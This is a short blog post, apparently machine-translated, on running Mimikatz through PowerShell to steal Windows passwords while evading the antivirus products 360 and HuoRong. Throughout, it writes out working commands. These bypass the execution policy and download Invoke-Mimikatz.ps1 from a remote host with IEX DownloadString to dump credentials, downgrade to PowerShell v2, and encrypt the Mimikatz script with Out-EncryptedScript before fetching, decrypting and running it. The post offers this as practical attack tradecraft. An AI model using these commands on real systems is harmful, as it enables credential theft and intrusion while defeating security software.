Powershell bypass catch password


Some of the words

none
From a practical point of view, solve the practical problems encountered, simple record, can bypass 360 and HuoRong

Introduction

none
According to PowerShell's default policy, ps1 scripts are not allowed to execute

Get-executionpolicy indicates that the current policy is Restricted

powershell
You can change the execution policy with the administrator permission. Do not ask me why I have the administrator permission. You can not catch passwords with the normal user

Set-ExecutionPolicy Unrestricted

Actual use

PSV2

none
as we all known the easy way like this
powershell -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://192.168.159.1:8888/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

now you can use the v2 maybe can bypass some av like this
powershell -Version 2 -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://192.168.159.1:8888/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

Encode script

powershell
as we all know the Powersploit project, how about use this project to bypass?

Here we use the out-encryptedScript to place the script in the same directory as the MimiKatz script, and then encrypt it in turn

Import-Module .\Out-EncryptedScript.ps1
Out-EncryptedScript -ScriptPath .\Invoke-Mimikatz.ps1 -Password woshijiamide -Salt safety

```

powershell
let our ps1script up to our tar then like this

powershell.exe
IEX(New-Object Net.WebClient).DownloadString("http://192.168.159.1:8888/Out-EncryptedScript.ps1") 
[String] $cmd = Get-Content .\new1.ps1
Invoke-Expression $cmd
$decrypted = de woshijiamide safety
Invoke-Expression $decrypted
Invoke-Mimikatz

none
the same way, Of course, both files are put remote, also does not affect the final effect 

maybe will get some wrong, but we also can catch PW


Author: Yangsir
Reprint policy: All articles in this blog are used except for special statements CC BY 4.0 reprint policy. If reproduced, please indicate source Yangsir !